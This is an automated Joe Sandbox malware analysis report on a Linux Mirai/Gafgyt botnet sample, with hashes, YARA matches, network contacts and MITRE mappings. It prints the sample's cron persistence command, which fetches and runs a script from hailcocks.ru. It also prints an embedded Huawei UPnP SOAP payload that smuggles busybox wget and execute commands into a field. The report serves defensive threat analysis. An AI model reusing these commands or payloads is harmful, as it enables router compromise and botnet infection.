Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86.elf

Overview

General Information

Sample name:x86.elf
Analysis ID:1543082
MD5:bb9275394716c60d1941432c7085ca13
SHA1:43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256:3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Machine Learning detection for sample
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1543082
Start date and time:2024-10-27 08:07:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86.elf
Detection:MAL
Classification:mal88.troj.linELF@0/1@22/0
Command:/tmp/x86.elf
PID:6257
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • x86.elf (PID: 6257, Parent: 6181, MD5: bb9275394716c60d1941432c7085ca13) Arguments: /tmp/x86.elf
    • x86.elf New Fork (PID: 6258, Parent: 6257)
    • sh (PID: 6258, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6259, Parent: 6258)
        • sh New Fork (PID: 6261, Parent: 6259)
        • crontab (PID: 6261, Parent: 6259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6260, Parent: 6258)
      • crontab (PID: 6260, Parent: 6258, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • x86.elf New Fork (PID: 6262, Parent: 6257)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xdf4c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      x86.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xe73b:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      x86.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xb082:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0x105e0:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      Click to see the 6 entries
      SourceRuleDescriptionAuthorStrings
      6257.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6257.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6257.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0xdf4c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6257.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0xe73b:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          6257.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
          • 0xb082:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          • 0x105e0:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          Click to see the 7 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86.elfReversingLabs: Detection: 50%
          Source: x86.elfVirustotal: Detection: 48%Perma Link
          Source: x86.elfJoe Sandbox ML: detected
          Source: tmp.gD7MWz.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

          Networking

          barindex
          Source: global trafficTCP traffic: 194.87.198.29 ports 11060,0,1,6,15763,11314
          Source: global trafficTCP traffic: 31.13.248.89 ports 4069,0,5,7,8,8507
          Source: global trafficTCP traffic: 88.151.195.22 ports 4431,0,1,3,6,13106
          Source: global trafficTCP traffic: 192.168.2.23:55368 -> 31.13.248.89:8507
          Source: global trafficTCP traffic: 192.168.2.23:40530 -> 91.149.238.18:4226
          Source: global trafficTCP traffic: 192.168.2.23:35130 -> 194.87.198.29:11060
          Source: global trafficTCP traffic: 192.168.2.23:47208 -> 81.29.149.178:7680
          Source: global trafficTCP traffic: 192.168.2.23:60534 -> 88.151.195.22:13106
          Source: global trafficTCP traffic: 192.168.2.23:42144 -> 91.149.218.232:13644
          Source: global trafficTCP traffic: 192.168.2.23:42040 -> 193.233.193.45:3024
          Source: /tmp/x86.elf (PID: 6257)Socket: 127.0.0.1:1172Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
          Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
          Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
          Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
          Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
          Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
          Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
          Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
          Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
          Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
          Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
          Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
          Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
          Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
          Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
          Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
          Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
          Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
          Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
          Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
          Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
          Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
          Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
          Source: tmp.gD7MWz.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
          Source: x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
          Source: Initial sampleString containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: classification engineClassification label: mal88.troj.linELF@0/1@22/0

          Persistence and Installation Behavior

          barindex
          Source: /bin/sh (PID: 6261)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
          Source: /bin/sh (PID: 6260)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
          Source: /usr/bin/crontab (PID: 6260)File: /var/spool/cron/crontabs/tmp.gD7MWzJump to behavior
          Source: /usr/bin/crontab (PID: 6260)File: /var/spool/cron/crontabs/rootJump to behavior
          Source: /tmp/x86.elf (PID: 6258)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
          Source: submitted sampleStderr: no crontab for root: exit code = 0

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: x86.elf, type: SAMPLE
          Source: Yara matchFile source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86.elf PID: 6257, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: x86.elf, type: SAMPLE
          Source: Yara matchFile source: 6257.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86.elf PID: 6257, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          Valid Accounts1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          Direct Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job2
          Scripting
          Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
          Application Layer Protocol
          Traffic DuplicationData Destruction
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543082 Sample: x86.elf Startdate: 27/10/2024 Architecture: LINUX Score: 88 26 31.13.248.89, 33284, 4069, 55368 NETERRA-ASBG Bulgaria 2->26 28 194.87.198.29, 11060, 11314, 15763 LOGOL-ASRU Russian Federation 2->28 30 8 other IPs or domains 2->30 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected Mirai 2->40 42 2 other signatures 2->42 9 x86.elf 2->9         started        signatures3 process4 process5 11 x86.elf sh 9->11         started        13 x86.elf 9->13         started        process6 15 sh crontab 11->15         started        19 sh 11->19         started        file7 24 /var/spool/cron/crontabs/tmp.gD7MWz, ASCII 15->24 dropped 32 Sample tries to persist itself using cron 15->32 34 Executes the "crontab" command typically for achieving persistence 15->34 21 sh crontab 19->21         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 21->44
          SourceDetectionScannerLabelLink
          x86.elf50%ReversingLabsLinux.Backdoor.Gafgyt
          x86.elf48%VirustotalBrowse
          x86.elf100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
          http://hailcocks.ru/wget.sh;16%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          kingstonwikkerink.dyn
          88.151.195.22
          truetrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://hailcocks.ru/wget.sh;tmp.gD7MWz.18.drfalseunknown
            http://schemas.xmlsoap.org/soap/encoding/x86.elffalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/soap/envelope/x86.elffalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            194.87.198.29
            unknownRussian Federation
            49352LOGOL-ASRUtrue
            193.233.193.45
            unknownRussian Federation
            2895FREE-NET-ASFREEnetEUfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.149.218.232
            unknownPoland
            198401GECKONET-ASPLfalse
            31.13.248.89
            unknownBulgaria
            34224NETERRA-ASBGtrue
            88.151.195.22
            kingstonwikkerink.dynAzerbaijan
            15723AZERONLINEAZtrue
            91.149.238.18
            unknownPoland
            41952MARTON-ASPLfalse
            81.29.149.178
            unknownSwitzerland
            39616COMUNICA_IT_SERVICESCHfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            194.87.198.29x86.elfGet hashmaliciousUnknownBrowse
              arm5.elfGet hashmaliciousUnknownBrowse
                nshmpsl.elfGet hashmaliciousUnknownBrowse
                  nshmips.elfGet hashmaliciousUnknownBrowse
                    mips.elfGet hashmaliciousUnknownBrowse
                      ppc.elfGet hashmaliciousUnknownBrowse
                        mips.elfGet hashmaliciousUnknownBrowse
                          arm5.elfGet hashmaliciousUnknownBrowse
                            193.233.193.45x86.elfGet hashmaliciousUnknownBrowse
                              arm5.elfGet hashmaliciousUnknownBrowse
                                nsharm7.elfGet hashmaliciousUnknownBrowse
                                  nshmpsl.elfGet hashmaliciousUnknownBrowse
                                    nsharm.elfGet hashmaliciousUnknownBrowse
                                      harm5.elfGet hashmaliciousUnknownBrowse
                                        nshsh4.elfGet hashmaliciousUnknownBrowse
                                          harm4.elfGet hashmaliciousUnknownBrowse
                                            mips.elfGet hashmaliciousUnknownBrowse
                                              hmips.elfGet hashmaliciousUnknownBrowse
                                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                91.149.218.232x86.elfGet hashmaliciousUnknownBrowse
                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                                      nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                        nsharm.elfGet hashmaliciousUnknownBrowse
                                                          nshmips.elfGet hashmaliciousUnknownBrowse
                                                            nsharm5.elfGet hashmaliciousUnknownBrowse
                                                              nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                harm4.elfGet hashmaliciousUnknownBrowse
                                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    kingstonwikkerink.dynx86.elfGet hashmaliciousUnknownBrowse
                                                                    • 195.133.92.51
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 185.82.200.181
                                                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 81.29.149.178
                                                                    nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    nsharm.elfGet hashmaliciousUnknownBrowse
                                                                    • 195.133.92.51
                                                                    nshmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    gmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 185.82.200.181
                                                                    harm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 213.182.204.57
                                                                    nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
